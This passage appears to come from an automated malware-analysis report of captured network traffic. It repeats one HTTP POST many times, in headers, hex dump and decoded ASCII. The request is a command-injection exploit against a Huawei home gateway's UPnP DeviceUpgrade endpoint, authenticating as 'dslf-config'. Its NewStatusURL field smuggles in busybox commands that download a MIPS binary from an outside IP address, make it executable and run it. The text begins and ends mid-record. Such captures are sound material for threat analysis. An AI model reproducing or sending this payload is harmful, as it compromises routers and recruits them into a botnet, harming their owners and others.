/tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 